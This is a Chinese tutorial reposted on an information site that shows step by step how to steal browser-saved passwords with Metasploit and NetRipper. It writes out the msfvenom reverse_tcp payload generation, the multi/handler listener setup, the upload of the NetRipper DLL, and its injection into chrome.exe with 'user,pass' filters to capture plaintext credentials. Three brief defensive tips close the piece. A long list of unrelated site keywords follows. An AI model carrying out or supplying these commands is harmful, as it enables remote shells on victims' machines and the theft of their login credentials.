如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能
千家信息网最后更新 2025年12月01日如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试1.下载并且配置NetRipper
5.测试验证
如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
前言
我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。
需要工具:
Kali Linux&Metasploit
NetRipper
1.下载并且配置NetRipper
git clone https://github.com/NytroRST/NetRipper.git
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
2.生成Windows的Payload用于建立于目标机器的连接
msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe
3.启动Metasploit并且进行监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 6666
options
exploit
目标机运行Payload获取到反弹shell
4.上传DLL和exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下
Upload /root/Desjtop/NetRipper/x64/DLL.dllUpload /root/Desjtop/NetRipper/x64/NetRipper.exe
shell
NetRipper.exe
运行NetRipper.exe
NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
NetRipper.exe ConfiguredDLL.dll chrome.exe
我注入到了是chrome浏览器的进程,你也可以注入到其他浏览器(火狐,QQ浏览器,360浏览器等等)的进程,这里以Chrom浏览器为主
5.测试验证
打开那个刚刚下载的txt文件
Ctir+F输入pwpw或者pwd、pass、password等关键词来搜索明文密码
如果获取失败帐号密码的话,可能是网站使用了Https协议,或者登陆时在本地就进行了帐号口令的一个加密混淆!(个人推断) 防范方法:
1.不要点击来历不明的文件
2.浏览器登录可以扫描就扫描登录
3.如果没有必要个人建议不要在浏览器保存自己的社交帐号密码
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。
浏览器
浏览
密码
帐号
文件
目标
测试
个人
机器
进程
帮助
登录
运行
清楚
必要
手把手
来历不明
关键
关键词
内容
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全学习周是几月
北京顺丰软件开发
中国移动客户数据库在哪里
奇游网络技术有限公司
直销软件开发的好选择
用DBeaver建立数据库
支付数据库设计
绝地求生新服务器怎么玩
人机界面硬件功能及软件开发
北京教育软件开发公司
确保服务器安全的手段
镇江网络技术培训中心
数据库cache 教程
互联网支付科技股票
联想7d4m服务器怎么开机
供电企业网络安全管理标准
2018国字网络安全主题
网络安全及ehs安全保障
网络安全管理概念
软件开发java接单群
网络安全评估多久评估
网络安全基地当兵
四川宜米互联网科技有限公司
网络安全定级单位
企朋网络技术有限公司怎么样
南航广州软件开发待遇
腾讯云服务器会计科目
网络安全龙头股还有哪些
金融网络安全宣传ppt
四大行的软件开发中心有前景